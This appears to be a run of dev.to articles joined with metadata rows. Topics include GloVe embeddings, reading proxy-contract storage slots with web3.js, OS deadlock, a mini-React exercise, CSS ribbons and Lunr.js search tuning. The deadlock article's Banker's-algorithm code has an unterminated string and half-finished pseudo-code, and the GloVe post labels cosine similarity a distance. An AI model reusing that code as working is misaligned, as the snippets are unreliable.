def get_word_similarity(embeddings, word2id, word1, word2):
```
**Lastly, this function calculates the cosine similarity between any two word vectors.** It provides a measure of how semantically similar the words are, with 1 representing identical words and 0 indicating no semantic similarity.
```python
similarity = get_word_similarity(embeddings, word2id, 'sun', 'sky')
print(f"The distance between the two words is: {similarity}")
# The distance between the two words is: 0.9828447113750172
```
Finally, the script calculates and prints the semantic distance between **‘sun’** and **‘sky’**, giving a glimpse of how Contexto.me uses this kind of calculation in its gameplay.
## Full implementation of the code
```python
# Import the necessary libraries:
import os # For reading files and managing paths
import numpy as np # For performing mathematical operations
from scipy.sparse import lil_matrix # For handling sparse matrices
from sklearn.decomposition import TruncatedSVD # For Singular Value Decomposition (SVD)
from sklearn.metrics.pairwise import cosine_similarity # For calculating cosine similarity between vectors
# Define the path to the corpus folder and obtain the list of text files
corpus_folder = "./corpus"
file_names = [f for f in os.listdir(corpus_folder) if f.endswith(".txt")]
# Initialize an empty list to store the words from the corpus
corpus = []
# Read each text file in the corpus folder and append the words to the corpus list
for file_name in file_names:
file_path = os.path.join(corpus_folder, file_name)
with open(file_path, "r") as corpusFile:
for linea in corpusFile:
word_line = linea.strip().split()
corpus.extend(word_line)
# Function to create a co-occurrence matrix from the corpus with a given window size
def create_co_occurrence_matrix(corpus, window_size=4):
vocab = set(corpus) # Create a set of unique words in the corpus
word2id = {word: i for i, word in enumerate(vocab)} # Create a word-to-index dictionary for the words
id2word = {i: word for i, word in enumerate(vocab)} # Create an index-to-word dictionary for the words
matrix = lil_matrix((len(vocab), len(vocab))) # Initialize an empty sparse matrix of size len(vocab) x len(vocab)
    # Iterate through the corpus to fill the co-occurrence matrix; the +1 keeps
    # the right-hand context the same size as the left, since range() excludes
    # its upper bound
    for i in range(len(corpus)):
        for j in range(max(0, i - window_size), min(len(corpus), i + window_size + 1)):
            if i != j:
                matrix[word2id[corpus[i]], word2id[corpus[j]]] += 1
return matrix, word2id, id2word
# Function to perform SVD on the co-occurrence matrix and reduce the dimensionality
def perform_svd(matrix, n_components=300):
n_components = min(n_components, matrix.shape[1] - 1)
svd = TruncatedSVD(n_components=n_components)
return svd.fit_transform(matrix)
# Function to create word embeddings from the corpus using the co-occurrence matrix and SVD
def create_word_embeddings(corpus):
matrix, word2id, id2word = create_co_occurrence_matrix(corpus) # Create the co-occurrence matrix
word_embeddings = perform_svd(matrix) # Perform SVD on the matrix
return word_embeddings, word2id, id2word
# Create the word embeddings from the given corpus
embeddings, word2id, id2word = create_word_embeddings(corpus)
# Function to calculate the cosine similarity between two word vectors
def get_word_similarity(embeddings, word2id, word1, word2):
word1_vector = embeddings[word2id[word1]] # Get the vector representation of word1
word2_vector = embeddings[word2id[word2]] # Get the vector representation of word2
# Compute the cosine similarity between the two vectors
similarity = cosine_similarity(word1_vector.reshape(1, -1), word2_vector.reshape(1, -1))
return similarity[0][0]
# Example usage: Calculate the similarity between the word embeddings for 'sun' and 'sky'
similarity = get_word_similarity(embeddings, word2id, 'sun', 'sky')
print(f"The distance between the two words is: {similarity}")
```
You don’t want to run the code on your machine, do it in [Google Colab](https://colab.research.google.com/drive/10LSwy6VdgljHRZW-kGaZ5az9dbxwnwjH?usp=sharing&source=post_page-----f759a4b778d0--------------------------------).
You can also clone it from [github](https://github.com/EsteveSegura/GloVe-implementation?source=post_page-----f759a4b778d0--------------------------------) (with corpus included).
## The Importance of Corpus in GloVe Technique
The lifeblood of any **Natural Language Processing (NLP) technique**, including **GloVe**, is a **‘corpus’**. A corpus is a large and structured set of texts that the algorithm learns from. Just as humans learn language by reading, listening, and understanding context, machines need a corpus to learn the semantic relationships between words.
In the realm of GloVe, the corpus plays a pivotal role. The algorithm scrutinizes the corpus to determine how often each pair of words co-occurs within a certain context window. From this, GloVe constructs a co-occurrence matrix that serves as the foundation for generating word vectors. **Essentially, the quality and diversity of the corpus directly influence the ability of GloVe to capture and quantify semantic meanings accurately.**
**Where can you find corpora for your own NLP projects? Fortunately, numerous resources are available online. Here are a few:**
1. [Project Gutenberg](https://www.gutenberg.org/): Offers over 60,000 free eBooks, primarily from the public domain. It’s an excellent resource for historical and classic texts.
2. [Wikipedia dump](https://www.sketchengine.eu/english-wikipedia-corpus/): The entire text of English Wikipedia is available for download, providing a vast and diverse language resource.
3. [The Brown Corpus](https://www.sketchengine.eu/brown-corpus/): Compiled at Brown University, this corpus contains 500 samples of English-language text, totaling roughly one million words.
4. [The Reuters Corpus](https://trec.nist.gov/data/reuters/reuters.html): Contains 10,788 news documents totaling 1.3 million words. It’s specifically useful for applications like news article classification.
5. [Common Crawl](https://commoncrawl.org/): An open repository of web crawl data that can be accessed and analyzed by everyone.
## One last detail to understand GloVe
**A larger, diverse corpus leads to more accurate results in word similarity and semantic distance measurements**. This is due to the wider range of word contexts it provides for the learning algorithm. Hence, a substantial corpus is essential for optimal outcomes. | estevesegura | |
1,661,293 | Retrieving Implementation Contract Addresses from Proxy Contracts in EVM Networks | Proxy patterns, such as Transparent and UUPS (Universal Upgradeable Proxy Standard), are critical in... | 0 | 2023-11-09T02:07:46 | https://dev.to/mister_g/retrieving-implementation-contract-addresses-from-proxy-contracts-in-evm-networks-38fm | solidity, web3, javascript, webdev | Proxy patterns, such as Transparent and UUPS (Universal Upgradeable Proxy Standard), are critical in the upgradeable design of smart contracts. However, discerning the implementation contract address from a proxy through block explorers can be challenging. This article aims to instruct developers on extracting this information using JavaScript and web3.js, enhancing the integration of Web 2.0 with smart contracts.
Proxy contracts serve as an intermediary, delegating operations to implementation contracts, which contain the executable logic. This delegation facilitates the upgradeability of contracts without altering the deployed address. Think of a proxy as a controller: you can change the logic behind an API service without changing the endpoint or how the method is called. The implementation is like a service class: it holds the logic and can be updated when needed.
Patterns: Transparent proxies separate the proxy administration and logic concerns, allowing different addresses for admin and logic operations. In contrast, UUPS proxies embed the upgrade logic within the implementation contract itself, offering a more gas-efficient and elegant upgrade mechanism. Also, Transparent proxies have a separate Admin contract responsible for Access Control, Upgrades, and Ownership control.

Block Explorer showing the current implementation contract address
Limitations of Block Explorers: Block explorers can show the current implementation address, but in some cases it can differ from the one actually registered on-chain. If you deploy a new implementation contract, it takes a few minutes for the block explorer to update this information, and if the explorer's indexing fails, the displayed address cannot be trusted.
Extracting the Address from the blockchain: To circumvent this limitation, developers can employ web3.js to interact with the blockchain and programmatically determine the implementation contract’s address. The UUPS and Transparent proxy patterns follow EIP-1967, which defines a specific storage slot that holds the implementation contract address. Based on this, you can use the code below to extract the current address.
```js
import Web3 from 'web3';

const web3 = new Web3("https://polygon-testnet.public.blastapi.io/");

async function getImplementationAddress(proxyAddress) {
    // Read the EIP-1967 implementation slot of the proxy
    const implementationStorage = await web3.eth.getStorageAt(proxyAddress, "0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc");
    if (implementationStorage === "0x0000000000000000000000000000000000000000000000000000000000000000") return null;
    const implementationAddressHex = "0x" + implementationStorage.slice(-40); // Extract the last 40 characters (20 bytes) from the storage content
    const currentImplementationAddress = web3.utils.toChecksumAddress(implementationAddressHex); // Validate the address
    console.log("Found current Implementation contract address", currentImplementationAddress);
    return currentImplementationAddress;
}
```
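If you are wondering where that long hexadecimal constant comes from: EIP-1967 defines the implementation slot as `keccak256('eip1967.proxy.implementation') - 1`. A quick sketch to verify it yourself (using `web3.utils.sha3`, which computes keccak-256 despite its name):

```js
import Web3 from 'web3';

const web3 = new Web3(); // no provider needed, we only use the utils
const hash = web3.utils.sha3('eip1967.proxy.implementation');
const slot = "0x" + (BigInt(hash) - 1n).toString(16);
console.log(slot); // 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc
```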
For the Transparent pattern, you can also get the Proxy Admin contract using the code below:
```js
import Web3 from 'web3';

const web3 = new Web3("https://polygon-testnet.public.blastapi.io/");

async function getProxyAdminAddress(proxyAddress) {
    // Read the EIP-1967 admin slot (populated by the Transparent pattern)
    const adminStorageContent = await web3.eth.getStorageAt(proxyAddress, "0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103");
    if (adminStorageContent === "0x0000000000000000000000000000000000000000000000000000000000000000") return null;
    const adminAddressHex = "0x" + adminStorageContent.slice(-40);
    const currentProxyAdminAddress = web3.utils.toChecksumAddress(adminAddressHex); // Validate the address
    console.log("Found Proxy Admin contract address in Transparent pattern", currentProxyAdminAddress);
    return currentProxyAdminAddress;
}
```
Remember to initialize Web3 with your own RPC before using it.
If you are a Web 2.0 developer, this code gives you a more reliable way to determine the current implementation contract and interact with it if needed.
To help you read, change, test, and deploy contracts, check out my project: [DevWeb3.co](https://devweb3.co) | mister_g |
1,661,373 | Unlocking the Power of Open Source: How to Get Involved and Why It Matters | Open source is the pulse of the modern software ecosystem. From tiny libraries to operating system... | 0 | 2023-11-09T05:17:33 | https://dev.to/opensign/unlocking-the-power-of-open-source-how-to-get-involved-and-why-it-matters-2b68 | webdev, javascript, beginners, opensource | Open source is the pulse of the modern software ecosystem. From tiny libraries to operating system behemoths, open-source projects drive innovation and keep the digital world spinning. If you're a developer who hasn't yet plunged into the open-source pool, you're missing out on an ocean of opportunities. In this post, we'll explore why contributing to open-source is a game-changer for your career, your skills, and the tech community.
## Why Contribute to Open Source?
**Career Advancement:** Open-source contribution is a sparkling gem on your resume. It signals to employers that you are collaborative, proactive, and passionate about your work.
**Skill Enhancement:** Working on open-source projects exposes you to the best coding practices and new technologies. It's a practical, fast-tracked learning experience.
**Community and Networking:** The open-source community is a tech nexus. You'll connect with like-minded individuals, mentors, and industry leaders.
**Philanthropy with Code:** Contributing to open-source is giving back. Your code could help non-profits, global enterprises, and everything in between.
## How to Start Contributing
1. **Choose a Project:** Start with something that piques your interest or uses a technology stack you're familiar with.
2. **Understand the Contribution Guidelines:** Every project has its own set of rules for contribution. Respect the process and communicate clearly.
3. **Start Small:** Look for 'good first issue' tags in project repositories. These are welcoming first steps for newcomers.
4. **Submit a Pull Request (PR):** Once you've made your changes, submit a PR. Make sure your code aligns with the project's style and contribution guidelines.
5. **Engage in the Discussion:** Maintainers may suggest changes. Stay responsive, open to suggestions, and ready to make improvements.
## Your First Contribution: A Guided Example
Let's say you're interested in web development and want to contribute to a project that's making a difference. [OpenSign](https://github.com/opensignlabs/opensign), an open-source document e-signing platform, could be a great start. Here’s how you can contribute:
1. **Familiarize with OpenSign:** Check out its GitHub repo, understand its documentation, and set it up on your local machine.
2. **Find an Issue:** Look for open issues tagged with "help wanted" or "good first issue."
3. **Communicate:** Post a comment expressing your wish to tackle the issue. Maintainers appreciate a heads-up.
4. **Fix the Issue:** Write your code, keeping in line with OpenSign’s practices.
5. **Pull Request:** Submit your PR with a clear description of your changes and any other comments that can help maintainers review your contribution.
## The Ripple Effect of Your Contribution
By contributing to open-source projects like OpenSign, you're not just writing code—you're supporting privacy, security, and innovation in digital document handling. Each contribution is a building block in a technology that could empower businesses, protect individual rights, and foster trust in digital transactions.
## Take the Leap
Don't let another day go by without contributing to open source. Dive into the code, and you'll emerge a better developer and collaborator. Remember, open source is more than just coding—it's an adventure in continuous learning and community building.
Ready to start your open-source journey? Visit [OpenSign](https://github.com/opensignlabs/opensign) on GitHub and see where your skills can take the project. Whether it's improving documentation, designing UI/UX, or enhancing security features, your code could make the next big impact.
Happy coding, and we can't wait to see the contributions you'll make!
{% cta https://github.com/opensignlabs/opensign %} ⭐ OpenSign on GitHub{% endcta %}
| alexopensource |
1,661,398 | Deadlock in Operating System | Introduction Deadlock is a critical problem in programs and operating systems. It happens... | 24,699 | 2023-11-09T05:36:18 | https://dev.to/syedmuhammadaliraza/deadlock-in-operating-system-30e2 | computerscience, softwareengineering, operatingsystem, deadlock | # Introduction
Deadlock is a critical problem in programs and operating systems. It happens when two or more processes or threads cannot continue because they are waiting for each other to release a resource. In this article, we will explore the concept of deadlock, its causes, prevention strategies, and various resolution algorithms with code examples.
## What is Deadlock?
This is best understood through a simple analogy: imagine two people trying to pass each other in a narrow corridor. If both refuse to step aside, they are stuck in a "deadlock" because neither can move forward without the other's cooperation.
In computer science, a deadlock occurs when processes or threads cannot continue because each is waiting for a shared resource held by another. This can leave the system unresponsive or sluggish.
## Causes of Deadlock
Deadlocks can occur for a variety of reasons, but they always involve the following four conditions, known as the Coffman conditions (the four necessary conditions for deadlock):
1. **Mutual Exclusion**: At least one resource must be held in a non-shareable mode, meaning only one process or thread can use it at a time.
2. **Hold and Wait**: A process must be holding at least one resource while waiting to acquire additional resources.
3. **No Preemption**: A resource cannot be forcibly taken from a process; it can only be released voluntarily.
4. **Circular Wait**: There must be a circular chain of processes, each waiting for a resource held by the next process in the chain.
To avoid deadlock, you must ensure that at least one of these conditions cannot hold.
## Deadlock Prevention
Deadlock prevention aims to eliminate one or more of the four necessary conditions. Here are some strategies:
1. **Resource Allocation Graph**: Maintain a graph of which processes hold which resources and which resources they are requesting. If the graph contains no cycle, no deadlock exists; if a cycle appears, it identifies the deadlocked processes and resources (a minimal cycle check is sketched after this list).
2. **Resource Allocation Table**: Use a table to track the status of each resource: whether it is available, allocated, or requested by a process. This information supports allocation decisions.
3. **Resource Allocation Policy**: Implement a resource allocation policy that avoids unsafe states. For example, the Banker's algorithm only grants a request if the system remains in a safe state afterwards.
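To make the graph-based approach concrete, here is a minimal sketch of detecting a cycle in a wait-for graph, where an edge from `P1` to `P2` means process `P1` is waiting for a resource held by `P2`:

```Python
def has_cycle(wait_for):
    """wait_for: dict mapping each process to the processes it waits on."""
    visited, in_stack = set(), set()

    def dfs(node):
        visited.add(node)
        in_stack.add(node)
        for neighbor in wait_for.get(node, []):
            if neighbor in in_stack:  # back edge => circular wait
                return True
            if neighbor not in visited and dfs(neighbor):
                return True
        in_stack.discard(node)
        return False

    return any(dfs(p) for p in wait_for if p not in visited)

# P1 waits on P2 and P2 waits on P1, so the system is deadlocked
print(has_cycle({"P1": ["P2"], "P2": ["P1"]}))  # True
```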
## Deadlock Resolution Algorithms
A deadlock resolution (recovery) algorithm is used to break a deadlock when prevention fails. Here are the most commonly used strategies:
### 1. Kill one or more processes
In this strategy, one or more processes are terminated to break the deadlock. The process to terminate is selected based on certain criteria (for example, priority or resource usage).
```Python
# Pseudo-code: terminate a process to resolve the deadlock
def kill_process(process):
    process.terminate()
```
### 2. Resource Preemption
Resource preemption means taking resources away from one or more processes to break the deadlock. Preemption can be forcible (the resource is taken from the process) or cooperative (the process is asked to release it voluntarily).
```Python
# Pseudo-code: preempt a resource to resolve the deadlock
def preempt_resource(resource, from_process, to_process):
    from_process.release_resource(resource)
    resource.allocate_to(to_process)
```
## Examples
### Example 1: Dining Philosophers Problem
The Dining Philosophers problem is a classic example of a deadlock scenario in concurrent programming. A group of philosophers sits at a round table; each needs two chopsticks to eat, but there are only as many chopsticks as philosophers. If every philosopher picks up their left chopstick at the same time, no right chopstick is ever free, and the system deadlocks.
```Python
import threading

class Philosopher:
    def __init__(self, name, left_chopstick, right_chopstick):
        self.name = name
        self.left_chopstick = left_chopstick    # a threading.Lock
        self.right_chopstick = right_chopstick  # a threading.Lock

    def eat(self):
        # If every philosopher grabs their left chopstick first,
        # all of them wait forever for the right one: deadlock
        self.left_chopstick.acquire()
        self.right_chopstick.acquire()
        # Eat
        self.left_chopstick.release()
        self.right_chopstick.release()

chopstick1, chopstick2 = threading.Lock(), threading.Lock()
philosophers = [Philosopher("P1", chopstick1, chopstick2), ...]
```
### Example 2: Banker's Algorithm
The Banker's algorithm is a deadlock avoidance strategy: like a banker who only lends cash if every customer's maximum claim can still be met, it grants a resource request only if the system remains in a safe state afterwards. If an allocation cannot be made safely, the request is denied and the process waits, preventing deadlock.
```Python
def request_resource(process, resource, request):
if request <= resource.available:
if request <= resource.max - resource.allocated[process]:
resource.available -= request
resource.allocated[process] += request
return "Resource granted."
else:
return "Resource request exceeds maximum claim."
else:
return "Resource not available. Process must wait.
```
| syedmuhammadaliraza |
1,661,544 | Is Duolingo the right tool for learning? | I'd been using Duolingo for learning German for 1-2 months. Was it the right tool for learning new... | 0 | 2023-11-09T08:42:01 | https://dev.to/apetryla/is-duolingo-the-right-tool-for-learning-53aj | learning, discuss, productivity, career | I'd been using Duolingo for learning German for 1-2 months. Was it the right tool for learning new language? Not for me!
Duolingo doesn't take advantage of spaced repetition. I got sick and tired of successfully answering the same word for 15 lessons and then never seeing that word again. In total I did 2.5 units, so there was plenty of room for spaced repetition.
It's overly gamified. When I do my first lessons of the day, there are so many "achievements" that they distract from my focus and learning. Maybe development could focus more on the quality of learning instead of throwing out tons of fake achievements?
I'm not a native English speaker, so I often ended up writing a long English translation and having it marked wrong just because of a forgotten "the". Good job, Duo! You caught me...
The UI is also too primitive. For example, when I need to build a sentence out of multiple separate words provided as flashcards, I can't change the order of the words. I can only add a word to the end of the sentence, not insert it. This again often means rewriting the whole sentence when the missing word belongs at the beginning.
Overall, the learning felt slow and boring. In the first weeks I was excited, because I was learning a new language. Later, though, when I opened Duolingo, I felt more and more like it was a boring bureaucratic process I had to go through. Why? Too many lessons on the same topic, too much repetition, too slow. I felt that throwing away 2/3 of the content would result in a 3-times-better app.
So while this may be a tool for learning a new language, I consider it an inefficient, unstructured way of learning with poor UX. I dumped Duolingo about a month ago and changed my learning strategy. Now I feel more satisfied with my new learning process and feel that I'm improving faster.
What's Your experience learning languages? Have You used Duolingo? | apetryla |
1,661,775 | The only thing you need to master React! (from my 5 years of experience) | I've been working in and around React since the time it got popular. I've dug in every corner of it,... | 0 | 2023-11-11T14:52:32 | https://dev.to/goodgit/the-only-thing-you-need-to-master-react-from-my-5-years-of-experience-1i6o | react, webdev, javascript, programming | I've been working in and around React since the time it got popular. I've dug in every corner of it, from reading the source code to creating my own libraries to simplify the mess React can create at times.
But this was all possible because of one thing I did, and even to this date, I continue to do it when I want to learn something at its core in the least time possible.
**Create your own (mini) version of it.**
### Why?
React, at its core, is just a way to write HTML using JS. Why JS? Because it's a scripting language and you can write logic in it, while HTML is a declarative language and you can simply declare everything you want.
React combines the two. You can declare with logic, empowering everything. That's it. That's all React ever was, is, and will be.
### What to do?
I get it. The first thought of creating your own mini-version of React can seem both exciting and heart-pounding at the same time. Just like talking to your crush. But here, we will learn all about masterful flirting, i.e. how to masterfully create your own version of React.
### Steps:
1. Let's stop calling it "your version of React". Let's call it "GoodAct".
2. This is where you come in. I am not going to give you any code, because reading my code won't make you "master" React. You will have to open up VS Code and write your own. I will, however, do one thing for you: if you write your code, share the GitHub repo with me. I'll give it a try and feature some good ones in an article. Also, shoot me any questions, or reach out if you're stuck somewhere. Let's get you unstuck.
My email is shubham@goodgit.io
### Basics to understand
To keep things simple, let's not use JSX. It's basically a really complex version of "replace": replace this tag with this code, all the way down to plain HTML.
```jsx
<Blog title="Hello World" image="/static/image.png">
```
is replaced with
```html
<div class="blog">
<h1>Hello World</h1>
<image src="/static/image.png" />
</div>
```
### What to build?
Two things: a virtual DOM and state. That's it.
To keep things simple and close to the core, everything will live in a single HTML file. GoodAct should understand the following weird-looking syntax:
```html
<html>
<head>
<title>GoodAct</title>
</head>
<body>
<h1>{{ title }}</h1>
<p>{{ body }}</p>
<script src="goodact.js"></script>
</body>
</html>
```
```html
<html>
<head>
<title>GoodAct</title>
</head>
<body>
<input type="number" value="{{ userN }}"/>
<h1>Your number times 2 is {{ userN * 2}}</h1>
<script src="goodact.js"></script>
</body>
</html>
```
```html
<html>
<head>
<title>GoodAct</title>
</head>
<body>
{% for i in range(10) %}
<h1>Let's count {{ i }}. </h1>
{% endfor %}
<script src="goodact.js"></script>
</body>
</html>
```
That's it. 😂 I know, I know, it's crazy, but I also know you can do it. It's not easy, and it's going to work every muscle in your brain, but by the end of it you'll be smarter, sharper, and a master. 😉
Start on a weekend and think about how you can build something like this. For those of you familiar with Django or Flask, it will feel a lot like Jinja templating, and you're correct: that's where I drew my inspiration from.
Once you can build a system like this, you'll know exactly how React works under the hood, and you will have a newfound appreciation for the tool you are so used to using.
See you on the other side with your projects working. Shoot me an email if you need any help, just want to talk, or are excited to share what you built!
### Also, also, also
Use GoodGit to push your code to GitHub.
Just install it with
```bash
pip install goodgit
```
and then
```bash
gg add .
```
GoodGit takes care of the rest. You don't even have to write a commit message. Just go and use it. You can read about it at https://goodgit.io. | brainspoof |
1,662,292 | I have made 100+ CSS-only Ribbon Shapes | The Perfect Collection 🎀 | It's time for another collection! After the loaders, the hover effects, and the background patterns,... | 0 | 2023-11-13T10:37:12 | https://dev.to/afif/i-have-made-100-css-only-ribbon-shapes-the-perfect-collection-4374 | css, webdev, beginners, showdev | It's time for another collection! After [the loaders](https://dev.to/afif/css-loaderscom-the-biggest-collection-of-loading-animations-more-than-500--23jg), [the hover effects](https://dev.to/afif/100-underline-overlay-animation-the-ultimate-css-collection-4p40), and [the background patterns](https://dev.to/afif/i-created-100-unique-css-patterns-the-best-collection-31cl), let's make some Ribbon Shapes!
----
## <center> 👉 [CSS Ribbon Shapes](https://css-generators.com/ribbon-shapes/) 👈 </center>
----
More than 100 CSS-only Ribbon Shapes that are made using a **single element**. Yes, only one element per shape (even the most complex ones).
Stop looking at CSS Ribbons made with old and obsolete code. Mine are made with modern CSS and optimized with CSS variables. There are no magic numbers or fixed dimensions. All the shapes fit whatever content you put inside them and you can easily control them by adjusting a few variables.
What are you waiting for? All it takes is one click to copy the CSS of any ribbon shape.
---
You will find the classic ribbons but a lot of new and fancy ones. I won't detail all of them but here are some of my favorites.
### The Multi-line Ribbons
Probably the ones I like the most. It was a bit challenging to create a repeating shape that fits multi-line text. In the end, the final result is satisfying.

Here are two interactive demos where you can edit the text and see how the shape adjusts to fit the content.
{% codepen https://codepen.io/t_afif/pen/ZEwOZVB %}
{% codepen https://codepen.io/t_afif/pen/BaMRQor %}
### The Curved Ribbons
It wasn't easy to combine straight text with a curved shape, but I found a few interesting ideas.

### The Infinite Ribbons
A Ribbon that never ends? why not! You will find a few of them that extend to the edge of the screen in any direction you want (top, bottom, right, left).

They are built without pseudo-elements and won't create any overflow issues. Here are two demos to illustrate some of them (best viewed at full screen)
{% codepen https://codepen.io/t_afif/pen/NWoRJMy %}
{% codepen https://codepen.io/t_afif/pen/rNqJYrZ %}
---
What about you? Which one do you like? 👇
You can get a unique link for each ribbon. If you like the `#54` then the link is: https://css-generators.com/ribbon-shapes/#r54
You can easily share your favorite Ribbon Shape!
---
If you want to know the secret behind building such shapes, I have written a few articles that you can find here: https://css-articles.com
I will be writing more in the future so make sure to [subscribe to my RSS feed](https://css-articles.com/feed.xml) to not miss them.
I also shared a lot of [CSS Tips around ribbon shapes](https://css-tip.com/archive/?s=ribbon) so make sure to also subscribe [to the RSS feed of my CSS Tip website](https://css-tip.com/feed/feed.xml)
----
{% link https://dev.to/afif/i-made-100-css-loaders-for-your-next-project-4eje %}
{% link https://dev.to/afif/100-underline-overlay-animation-the-ultimate-css-collection-4p40 %}
{% link https://dev.to/afif/i-created-100-unique-css-patterns-the-best-collection-31cl %}
----
### <center>You want to support me?</center>
[](https://www.buymeacoffee.com/afif)
### <center>OR</center>
[](https://www.patreon.com/temani) | afif |
1,662,390 | A classic Snake game built using React.js, HTML Canvas, and TypeScript | Snake Game 🐍 A classic Snake game built using React.js, HTML Canvas, and... | 0 | 2023-11-10T08:58:59 | https://reactjsexample.com/a-classic-snake-game-built-using-react-js-html-canvas-and-typescript/ | games |
# Snake Game 🐍


A classic Snake game built using React.js, HTML Canvas, and TypeScript.
## Demo
You can play the game online at [Snake Game Demo](https://snakes-game-nine.vercel.app/).
## Features
- Classic Snake gameplay.
- Built with React.js and HTML canvas.
- No third-party libraries used.
- TypeScript for type safety.
- Responsive design.
- Score tracking.
- Saves HighScore
- Game over screen with the option to restart.
- Keyboard controls for navigation.
## Getting Started
To run the game locally, follow these steps:
1. Clone this repository:
2. Navigate to the project directory:
3. Install the required dependencies. Yarn is recommended:
4. Run the build script:
5. Start the game by serving the build output:
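Assuming a standard yarn workflow (the repository URL comes from the GitHub link below; the script names are assumptions, so check `package.json`), the commands for these steps look roughly like this:

```bash
git clone https://github.com/menard-codes/snakes-game.git
cd snakes-game
yarn          # install dependencies
yarn build    # run the build script
yarn serve    # serve the build output (script name assumed; 'npx serve' also works for static builds)
```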
**NOTE** : The development environment causes the components to re-render, causing the game logic for the canvas to be duplicated and appear buggy. That’s why it’s recommended to build the app and run the build output to avoid the re-renders.
## Game Controls
Use the arrow keys or `W`,`A`,`S`,`D` keys on your keyboard to control the snake’s direction:
- ↑ (Up) or `W` – Move Up
- ↓ (Down) or `S` – Move Down
- ← (Left) or `A` – Move Left
- → (Right) or `D` – Move Right
Others:
- To **Pause** the game – Press `esc` or click anywhere the screen
## License
This project is licensed under the MIT License – see the [LICENSE](https://github.com/menard-codes/snakes-game/blob/main/LICENSE) file for details.
## GitHub
[View Github](https://github.com/menard-codes/snakes-game?ref=reactjsexample.com) | mohammadtaseenkhan |
1,662,730 | How to Integrate the Angular Signature Pad with a Toolbar | Learn how to integrate the Angular Signature Pad with the Toolbar component. You’ll also see how to... | 0 | 2023-11-10T10:01:54 | https://dev.to/syncfusion/how-to-integrate-the-angular-signature-pad-with-a-toolbar-4n6g | webdev, angular | Learn how to integrate the Angular Signature Pad with the Toolbar component. You’ll also see how to use many of its customization options.
The Angular Signature Pad is a graphical interface that allows users to draw smooth signatures as vector outline strokes using variable-width Bezier curve interpolation. It allows you to save signatures as images and vice versa. You can use your finger, pen, or mouse on desktop and mobile devices to draw your own signature.
The Signature Pad control supports various customization options: background color, background image, stroke color, stroke width, save with background, undo, redo, clear, read-only, and disable. In this video, each toolbar item illustrates the Signature Pad component functionalities.
Use the Undo button or Ctrl + Z key combo to revert your signature, the Redo button or Ctrl + Y key combo to remake your reverted signature, and the Save button or Ctrl + S key combo to store your signature as an image file. Use a stroke color picker and background color picker in the Signature component to apply those aspects. Users can utilize the stroke width drop-split button values to change the signature stroke width.
The variable stroke width is based on the values of the maximum stroke width, minimum stroke width, and velocity for smoother and realistic signatures. The default value of the minimum stroke width is 0.5, the maximum stroke width is 2.5 and the velocity is 0.7. Use the Clear button to clear the signature. You can also check the Disabled checkbox to disable the Signature component. You can save the signature as an image to formats like PNG, JPEG, and SVG.
**Download an example from GitHub:** https://github.com/SyncfusionExamples/how-to-integrate-the-angular-signature-pad-with-the-toolbar
**Documentation on the Syncfusion Angular Signature Pad component:**
https://ej2.syncfusion.com/angular/documentation/signature/user-interaction
{% youtube ZuSSpp1dR44 %}
| techguy |
1,662,776 | Snaptube | Snaptube YouTube downloader & MP3 converter is a simple tool to download any video from YouTube... | 0 | 2023-11-10T11:17:49 | https://dev.to/snaptubeapps/snaptube-4k7d | webdev | [Snaptube](https://snaptubeapps.net/) YouTube downloader & MP3 converter is a simple tool to download any video from
YouTube and many other similar services, all in an easy, fast streaming app for music and video.
Download the latest version of Snaptube YouTube downloader & MP3 converter for Android. | snaptubeapps |
1,662,831 | Transitioning from Lunr.js to Minisearch.js | As I embarked on weeks five and six of my Google Summer of Code (GSoC) project, a pivotal shift took... | 26,962 | 2023-11-10T11:49:32 | https://dev.to/hetarth02/transitioning-from-lunrjs-to-minisearchjs-36aa | opensource, gsoc, julialang, devjournal | As I embarked on weeks five and six of my Google Summer of Code (GSoC) project, a pivotal shift took place in client-side searching. To optimize the initial load times, I transitioned from using Lunr.js to Minisearch.js. This change brought about a host of improvements and refinements that made a more efficient search functionality. In this blog post, I'll delve into the intricacies of this transition and explore key concepts of this transition.
## Current Implementation:
```js
lunr.tokenizer.separator = /[\s\-\.]+/
lunr.trimmer = function (token) {
return token.update(function (s) {
return s.replace(/^[^a-zA-Z0-9@!]+/, '').replace(/[^a-zA-Z0-9@!]+$/, '')
})
}
lunr.Pipeline.registerFunction(lunr.stopWordFilter, 'juliaStopWordFilter')
lunr.Pipeline.registerFunction(lunr.trimmer, 'juliaTrimmer')
var index = lunr(function () {
this.ref('location')
this.field('title', { boost: 100 })
this.field('text')
documenterSearchIndex['docs'].forEach(function (e) {
this.add(e)
}, this)
})
tokens.forEach(function (t) {
q.term(t.toString(), {
fields: ['title'],
boost: 100,
usePipeline: true,
editDistance: 0,
wildcard: lunr.Query.wildcard.NONE,
})
q.term(t.toString(), {
fields: ['title'],
boost: 10,
usePipeline: true,
editDistance: 2,
wildcard: lunr.Query.wildcard.NONE,
})
q.term(t.toString(), {
fields: ['text'],
boost: 1,
usePipeline: true,
editDistance: 0,
wildcard: lunr.Query.wildcard.NONE,
})
})
```
As you can see, we currently have many moving parts in the search logic: a tokenizer, a trimmer function, field boosting, and an `editDistance` parameter used during the search. We will learn what each of these does step by step.
### _Tokenization: The Foundation of Search_
```js
lunr.tokenizer.separator = /[\s\-\.]+/;
```
The process of tokenization involves breaking down the search input into individual tokens or words. This step is crucial as it lays the groundwork for the search engine to efficiently match the tokens against the indexed documents. Each token is subsequently treated as a unique identifier that allows for accurate and targeted search results. Here, the regex tokenizes on whitespace, hyphens, and `.`, because there are results such as `Documenter.Anchors.add!` that a search for `add!` would never find unless the qualified name is split apart.
### _Trimmer Function: Polishing the Search Input_
One of the challenges you encounter is dealing with special and unwanted characters that might hinder the search process. To address this, a trimmer function that sanitizes the search input is used. This function identifies and removes extraneous characters, ensuring that the search query remains clean and focused, which significantly contributes to the accuracy of search results. However, certain characters are useful to us, so the regex is written to preserve them: here, `@` and `!`, which appear in Julia macro and function names.
```js
// custom trimmer that doesn't strip @ and !
lunr.trimmer = function (token) {
return token.update(function (s) {
return s.replace(/^[^a-zA-Z0-9@!]+/, "").replace(/[^a-zA-Z0-9@!]+$/, "");
});
};
```
### _Stopwords: Filtering out the Noise_
